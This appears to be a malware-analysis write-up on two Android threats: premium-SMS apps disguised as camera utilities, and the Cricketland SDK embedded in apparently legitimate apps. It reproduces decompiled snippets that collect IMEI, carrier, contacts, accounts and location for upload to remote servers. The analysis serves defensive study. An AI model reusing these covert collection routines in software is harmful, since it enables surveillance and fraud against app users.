Phony Phone — Case Study 3&4

Case Study 3: Camera Apps:-

Collecting information about the device’s country and mobile carrier, this malware family often masqueraded as camera apps or other system utilities. It then sent this data to a command-and-control server and received the phone number and SMS message text to send. This technique allowed the malware to operate in different countries and expand into new ones without the need to update the apps. The following list, extracted from com.batterypro (v4, 29ee), illustrates how this device profiling data was gathered.

if (this.prefsWrapper.isFirstRun()) {

this.params.put(“pid”, this.getString(2131034134));

this.params.put(“pin”, String.valueOf(this.utils.getPin()));

this.params.put(“carrier”,

this.telephonyInfo.getTelephonyNetworkOperatorName().replaceAll(“\n”, “”));

this.params.put(“imei”, this.telephonyInfo.getTelephonyIMEI());

this.params.put(“market”, “1”);

this.params.put(“cc”,

this.telephonyInfo.getTelephonyNetworkOperator());

this.params.put(“appurl”, this.getString(2131034135));

}

Case Study 4: SDK used by Apps:-

Embedded within apparently legitimate apps originating from Vietnam, Cricketland served as an SDK. Operative without user consent, the SDK clandestinely transmitted the user’s contact list data to a remote server. Upon initialization by an app featuring Cricketland, the SDK gathered assorted information and promptly uploaded it to a webpage hosted on Google Drive. One instance of an app incorporating the Cricketland SDK was masteryourgames.amazingalextoolbox (v12, c4f0), showcasing its data collection code, delineated in the listing.

net.cricketland.android.lib.report.CReportField[] v0_4 =

new net.cricketland.android.lib.report.CReportField[17];

v0_4[0] = net.cricketland.android.lib.report.CReportField.DEVICE_ID;

v0_4[1] = net.cricketland.android.lib.report.CReportField.UUID;

v0_4[2] = net.cricketland.android.lib.report.CReportField.PACKAGE_NAME;

v0_4[3] = net.cricketland.android.lib.report.CReportField.VERSION_CODE;

v0_4[4] = net.cricketland.android.lib.report.CReportField.IP;

v0_4[5] = net.cricketland.android.lib.report.CReportField.PHONE;

v0_4[6] = net.cricketland.android.lib.report.CReportField.ACCOUNTS;

v0_4[7] = net.cricketland.android.lib.report.CReportField.CONTACTS;

v0_4[8] = net.cricketland.android.lib.report.CReportField.LOCALE;

v0_4[9] = net.cricketland.android.lib.report.CReportField.LOCATION;

v0_4[10] = net.cricketland.android.lib.report.CReportField.SDK;

v0_4[11] = net.cricketland.android.lib.report.CReportField.BUILD;

v0_4[12] = net.cricketland.android.lib.report.CReportField.CPU;

v0_4[13] = net.cricketland.android.lib.report.CReportField.MEM;

v0_4[14] = net.cricketland.android.lib.report.CReportField.DISPLAY;

v0_4[15] = net.cricketland.android.lib.report.CReportField.FEATURES;

v0_4[16] = net.cricketland.android.lib.report.CReportField.PACKAGES;